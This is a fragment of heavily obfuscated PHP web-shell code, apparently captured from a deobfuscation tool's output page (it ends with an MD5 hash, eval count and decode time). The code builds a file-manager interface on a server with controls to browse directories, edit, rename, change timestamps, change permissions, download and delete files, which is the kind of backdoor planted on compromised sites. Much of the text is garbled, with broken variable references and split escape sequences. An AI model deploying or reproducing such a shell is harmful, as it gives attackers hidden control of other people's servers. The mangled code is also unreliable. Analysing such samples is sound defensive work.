echo "\x3c/\x63\x65n\x74er\x3e</\x74d>\n<t\x64\x3e<ce\x6e\x74\x65\x72><f\x6f\x72m\x20\x6det\x68\x6fd\x3d\x22PO\x53T\x22\x20a\x63\x74\x69on=\"?\x70il\x69\x68\x61n&\x6cokny\x61\x3d$lokasi\"\x3e\n<i\x6e\x70ut ty\x70e=\x22h\x69dd\x65\x6e\" nam\x65=\x22\x74\x79pe\" \x76a\x6c\x75e\x3d\x22d\x69r\">\n<i\x6e\x70\x75t \x74y\x70\x65=\x22\x68i\x64d\x65n\"\x20\x6ea\x6de=\x22name\"\x20v\x61\x6c\x75\x65=\"$ppkcina\x22\x3e\n<\x69\x6e\x70u\x74\x20\x74ype\x3d\x22hid\x64e\x6e\x22 \x6ea\x6de\x3d\"\x6cok\x6e\x79\x61\"\x20va\x6c\x75e=\"$lokasi/$ppkcina\">\n\x3c\x62\x75t\x74\x6f\x6e\x20\x74yp\x65\x3d's\x75bmit'\x20\x63\x6ca\x73s\x3d'b\x74f\x27\x20na\x6de=\x27\x70ilih'\x20val\x75e=\x27f\x6f\x6cd\x65\x72'><\x69 cl\x61\x73s\x3d'f\x61\x20\x66a-\x66ol\x64e\x72\x27 \x73\x74y\x6c\x65=\x27c\x6fl\x6fr: #\x66f\x66\x27></i\x3e\x3c/\x62\x75t\x74on\x3e\n\x3cb\x75\x74\x74\x6f\x6e t\x79\x70\x65=\x27\x73u\x62\x6di\x74\x27\x20clas\x73\x3d'\x62t\x66\x27\x20\x6e\x61\x6d\x65\x3d'\x70il\x69h' v\x61lue=\x27fil\x65\x27\x3e\x3c\x69 c\x6c\x61\x73s='f\x61\x20fa-f\x69\x6c\x65'\x20\x73ty\x6ce\x3d'\x63olo\x72: #f\x66\x66'\x3e</i\x3e\x3c/but\x74\x6fn>\n\x3c/\x66\x6fr\x6d\x3e</\x63e\x6e\x74er\x3e";
echo "\x3c/tr\x3e";
foreach($ {
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}) {
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         == "." || $ {
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        $ {
    ."\"\x3e".$ {
    ."</\x61\x3e</td>\n\t\x3c\x74d>\x3c\x63e\x6e\x74e\x72\x3e--</\x63en\x74e\x72>\x3c/\x74\x64>\n\t<td>\x3c\x63\x65\x6e\x74\x65r\x3e".fdt($ {
        $ {
    })."\x3c/\x63en\x74\x65\x72\x3e\x3c/\x74\x64>\n\t\x3ctd\x3e<cen\x74e\x72>".gor($ {
        $ {
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        $ {
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        echo "\x3c/\x66\x6fn\x74>";
    echo "\x3c/c\x65\x6e\x74er\x3e\x3c/td\x3e\n\t<t\x64><c\x65n\x74er><\x66or\x6d m\x65th\x6fd=\x22POST\" \x61c\x74io\x6e\x3d\x22?p\x69liha\x6e&\x6co\x6bn\x79\x61=$lokasi\"\x3e\n\t<\x69nput ty\x70e=\x22hidde\x6e\x22\x20n\x61\x6de=\"\x74\x79pe\" \x76al\x75\x65=\"di\x72\">\n\t<\x69np\x75t\x20\x74\x79\x70e\x3d\"\x68idd\x65n\x22 n\x61\x6d\x65=\"\x6e\x61\x6d\x65\x22 \x76alue\x3d\x22$ppkcina\x22\x3e\n\t\x3c\x69\x6eput t\x79\x70e\x3d\"h\x69\x64\x64e\x6e\x22\x20na\x6d\x65=\"\x6co\x6bny\x61\x22\x20valu\x65=\"$lokasi/$ppkcina\x22\x3e\n\t<bu\x74t\x6fn\x20\x74\x79\x70\x65\x3d\x27s\x75b\x6d\x69\x74' \x63\x6cass\x3d\x27\x62\x74f' n\x61\x6de\x3d\x27pi\x6c\x69h\x27\x20valu\x65=\x27\x75\x62ah\x6ea\x6d\x61'>\x3c\x69\x20c\x6c\x61s\x73='\x66a \x66\x61-p\x65\x6e\x63il\x27\x20\x73\x74yl\x65=\x27\x63\x6f\x6cor: \x23fff\x27></\x69>\x3c/\x62\x75t\x74\x6f\x6e\x3e\n\t<\x62\x75tt\x6fn \x74ype='\x73\x75b\x6d\x69\x74' \x63\x6c\x61s\x73=\x27b\x74\x66\x27\x20n\x61m\x65\x3d'pi\x6c\x69h' \x76a\x6c\x75e=\x27ub\x61h\x74\x61\x6e\x67gal\x27><i cl\x61s\x73=\x27f\x61 \x66\x61-\x63a\x6ce\x6ed\x61\x72'\x20s\x74y\x6c\x65='\x63ol\x6f\x72: \x23f\x66f\x27>\x3c/\x69\x3e\x3c/\x62u\x74to\x6e\x3e\n\t\x3c\x62u\x74t\x6fn\x20\x74\x79\x70e\x3d'submi\x74' clas\x73\x3d'b\x74\x66' \x6e\x61m\x65=\x27p\x69lih'\x20va\x6cue='\x75b\x61h\x6d\x6f\x64\x27\x3e\x3ci\x20class\x3d\x27f\x61\x20\x66\x61-g\x65\x61r\x27 style\x3d\x27\x63\x6f\x6c\x6fr:\x20\x23f\x66f\x27\x3e</i>\x3c/\x62utt\x6f\x6e\x3e\n\t\x3cb\x75\x74to\x6e t\x79\x70\x65=\x27\x73\x75bm\x69\x74'\x20c\x6c\x61\x73\x73\x3d'b\x74f\x27\x20nam\x65\x3d\x27p\x69\x6c\x69\x68\x27 \x76alue='\x68a\x70u\x73'>\x3c\x69\x20cla\x73\x73\x3d'fa fa-\x74\x72\x61\x73h'\x20\x73tyl\x65\x3d\x27\x63\x6f\x6cor:\x20\x23fff\x27>\x3c/i\x3e\x3c/b\x75t\x74o\x6e\x3e\n\t\x3c/\x66\x6frm>\x3c/ce\x6et\x65r></\x74\x64\x3e\n\t\x3c/\x74r>";
echo "<tr \x63l\x61\x73\x73=\x22f\x69\x72\x73\x74\x22\x3e<t\x64>\x3c/td>\x3ctd\x3e</\x74\x64\x3e<t\x64\x3e</t\x64><td\x3e</td\x3e\x3ctd>\x3c/\x74d>\x3ct\x64>\x3c/t\x64>\x3c/t\x72>";
$ {
    $ {
} = "\x31\x30"."24";
foreach($ {
    $ {
    as$ {
}) {
    $xvkpqpcptrw = "\x73\x69\x7ae";
    $ocbsbfrhu = "\x73\x69\x7ae";
    $gxzhitfzw = "\x73\x6bd";
    $dxeplx = "\x69\x73w";
    $ {
    ["\x64\x68\x77r\x77\x6a\x6f\x74"] = "\x72d";
    $yocjmhu = "\x66\x73\x7a";
    $hpjvkrietd = "m\x65\x6b\x69\x63i\x6ea";
    $ {
        $ {
    } = $ {
        $ {
    ."/".$ {
    if (!$ {
        $ {
    $ {
    ["\x79qi\x6dm\x6e"] = "\x65\x75\x79b\x72\x61\x79";
    $ {
        $ {
    } = $ {
    ("$lokasi/$mekicina") / $ {
        $ {
    $ {
    } = $ {
        $ {
    ($ {
        $ {
    }, 3);
    $ {
    ["cq\x62\x72nt\x76\x6b"] = "\x65\x75\x79b\x72\x61y";
    if ($ {
         >= $ {
    }) {
        $ {
            $ {
        } = $ {
            $ {
        ($ {
            $ {
            /${${"GLOB\x41\x4cS"}["\x65u\x76t\x76\x6d\x73\x6f"]},2)." \x4d"."B";}else{${${"G\x4c\x4f\x42AL\x53"}["\x6c\x67\x6e\x67\x78\x77\x6e\x6d"]}=${${"GL\x4f\x42ALS"}["\x6c\x67\x6eg\x78\x77\x6em"]}." \x4b"."B";}$cgtbnewny="\x69\x73\x72";echo"<\x74r\x3e\n\x3c\x74d>".cfn(${${"\x47L\x4fBAL\x53"}["\x77\x77\x72wx\x69\x62c"]})." <\x61\x20\x68\x72\x65\x66=\"?\x6co\x6b\x61\x73\x69\x65\x3d$lokasi/$mekicina \ x26 \ x6co \ x6b \ x6e \ x79 \ x61 \ x3d$lokasi \ x22 > $mekicina <  / a \ x3e <  /  \ x74d \ x3e \ n \ x3c \ x74 \ x64 \ x3e < cen \ x74 \ x65 \ x72 \ x3e ".${${" \ x47 \ x4c \ x4f \ x42A \ x4c \ x53 "}[" lg \ x6eg \ x78 \ x77n \ x6d "]}." <  / c \ x65nt \ x65 \ x72 >  <  /  \ x74 \ x64 \ x3e \ n \ x3ctd \ x3e \ x3c \ x63e \ x6eter \ x3e ".fdt(${${" G \ x4cO \ x42AL \ x53 "}[" \ x77 \ x77 \ x72 \ x77 \ x78 \ x69 \ x62 \ x63 "]})." <  /  \ x63e \ x6et \ x65 \ x72 \ x3e <  /  \ x74d >  \ n <  \ x74d \ x3e <  \ x63e \ x6e \ x74 \ x65 \ x72 \ x3e ".gor(${${" \ x47 \ x4c \ x4fB \ x41 \ x4cS "}[" \ x63 \ x71 \ x62 \ x72 \ x6etvk "]})." \ x20 /  \ x20 ".ggr(${${" G \ x4cO \ x42 \ x41 \ x4c \ x53 "}[" \ x79 \ x71 \ x69 \ x6d \ x6dn "]})." <  / c \ x65 \ x6e \ x74 \ x65r \ x3e <  / t \ x64 \ x3e \ n < td \ x3e < c \ x65nter > ";if(${${" \ x47L \ x4f \ x42 \ x41 \ x4cS "}[" \ x66u \ x6f \ x74b \ x7a \ x69 \ x69 \ x70 \ x74 "]}(" $lokasi / $mekicina "))echo" < f \ x6fn \ x74 c \ x6f \ x6c \ x6f \ x72 =  \ x22g \ x72ee \ x6e \ x22 \ x3e ";elseif(!${$cgtbnewny}(" $lokasi / $mekicina "))echo" \ x3c \ x66 \ x6f \ x6et \ x20 \ x63 \ x6f \ x6c \ x6fr \ x3d \ "\x72e\x64\">"; echo statusnya("$lokasi/$mekicina"); if ($ {
                ("$lokasi/$mekicina") || !$ {
                $ {
                echo "\x3c/f\x6fnt>"; echo "\x3c/cent\x65r\x3e\x3c/t\x64\x3e<\x74\x64>\x3c\x63en\x74\x65\x72\x3e\n\x3cf\x6frm \x6d\x65\x74hod\x3d\x22p\x6fst\"\x20a\x63ti\x6f\x6e=\"?pi\x6ciha\x6e&lokny\x61\x3d$lokasi\">\n<but\x74\x6f\x6e\x20t\x79\x70\x65=\x27submi\x74'\x20c\x6ca\x73s='\x62t\x66\x27\x20\x6e\x61\x6de='\x70\x69\x6cih'\x20\x76alue=\x27e\x64\x69\x74\x27\x3e<\x69\x20cl\x61\x73s='fa\x20fa-e\x64\x69t\x27\x20\x73tyl\x65=\x27\x63olo\x72: \x23\x66f\x66'\x3e</i\x3e\x3c/\x62\x75t\x74on>\n\x3cbut\x74\x6fn\x20\x74yp\x65\x3d'su\x62\x6d\x69\x74\x27 c\x6cass='btf' \x6e\x61\x6de=\x27p\x69\x6ci\x68' \x76\x61\x6c\x75\x65=\x27\x75\x62\x61\x68nama\x27\x3e<\x69 \x63\x6ca\x73s\x3d'f\x61\x20f\x61-\x70e\x6ec\x69\x6c\x27\x20s\x74y\x6c\x65=\x27c\x6f\x6cor:\x20#\x66ff\x27></\x69></\x62u\x74to\x6e>\n<b\x75\x74t\x6f\x6e\x20\x74y\x70\x65\x3d'\x73ub\x6dit' c\x6c\x61ss='b\x74\x66\x27 n\x61\x6d\x65\x3d\x27\x70\x69\x6c\x69\x68\x27\x20\x76\x61\x6c\x75e=\x27u\x62\x61h\x74\x61n\x67\x67\x61\x6c'\x3e\x3ci\x20c\x6ca\x73\x73\x3d'f\x61 f\x61-\x63a\x6c\x65n\x64a\x72'\x20\x73\x74\x79le=\x27\x63\x6fl\x6fr: \x23f\x66f'></i\x3e\x3c/\x62ut\x74\x6fn>\n<b\x75\x74ton\x20t\x79\x70\x65='\x73ub\x6d\x69\x74\x27 cl\x61\x73\x73=\x27\x62\x74f\x27\x20n\x61m\x65\x3d'pi\x6ci\x68\x27\x20v\x61lue\x3d\x27\x75\x62\x61\x68mod'\x3e<\x69\x20\x63\x6cass=\x27\x66a fa-\x67\x65\x61\x72'\x20\x73\x74y\x6ce\x3d'co\x6c\x6fr:\x20#ff\x66'></\x69>\x3c/\x62\x75\x74t\x6f\x6e\x3e\n<\x62utto\x6e\x20\x74\x79\x70e\x3d\x27s\x75\x62mit' class='b\x74\x66'\x20na\x6d\x65=\x27\x70\x69\x6ci\x68' va\x6c\x75e\x3d'\x64\x75\x6e\x6cu\x74'\x3e\x3ci \x63la\x73s=\x27fa\x20\x66a-d\x6f\x77n"."load'\x20\x73\x74\x79l\x65='\x63\x6flor: #\x66\x66f\x27></i>\x3c/\x62\x75\x74\x74on\x3e\n<\x62\x75\x74ton \x74ype='s\x75\x62\x6di\x74'\x20c\x6c\x61ss\x3d\x27btf' \x6e\x61me=\x27\x70i\x6c\x69h\x27\x20\x76\x61lue='ha\x70us\x27\x3e\x3ci clas\x73=\x27fa fa-\x74r\x61s\x68'\x20\x73tyl\x65\x3d'\x63olor:\x20#ff\x66'>\x3c/i></b\x75\x74t\x6f\x6e>\n\x3c\x69\x6e\x70\x75t\x20\x74\x79\x70e=\"\x68\x69dde\x6e\"\x20\x6eam\x65\x3d\"\x74yp\x65\x22 va\x6cu\x65=\x22\x66i"."\x6ce\x22>\n\x3ci\x6e\x70\x75t\x20ty\x70\x65=\x22h\x69dde\x6e\x22\x20\x6e\x61m\x65=\x22\x6eam\x65\"\x20\x76\x61lu\x65\x3d\"$mekicina\x22\x3e\n<\x69\x6ep\x75t\x20t\x79p\x65=\"h\x69\x64d\x65\x6e\x22 na\x6de=\"\x6coknya\" \x76\x61\x6cue=\"$lokasi/$mekicina\">\n\x3c/\x66o\x72m></\x63\x65\x6ete\x72\x3e\x3c/t\x64>\n\x3c/t\x72>";
        echo "\x3c/tr>\x3c/\x74\x64></\x74\x61\x62\x6ce\x3e\x3c/tabl\x65>";
        function statusnya($fl) {
            $ {
                $ {
            } = "su\x62"."\x73t"."r";
            $ {
            ["\x6c\x72\x75u\x6e\x65\x62"] = "\x63";
            $ {
                $ {
            } = "s"."\x70\x72i"."\x6e\x74\x66";
            $fdhpoui = "\x69\x7ai\x6e";
            $ {
            ["\x72\x6cc\x6a\x6c\x76u\x63\x78et\x63"] = "fl";
            $ {
                $ {
            } = "fil"."\x65p\x65\x72"."\x6d\x73";
            $vcxhzmxby = "a";
            $ {
                $ {
            } = $ {
            ($ {
                $ {
                ("\x25o", $ {
                    $ {
                    ($ {
                        $ {
                    })), -4);
            return$ {
        ?  >

Function Calls





MD5 c1b4beb5d0afac7406f49e413e110121
Eval Count 0
Decode Time 251 ms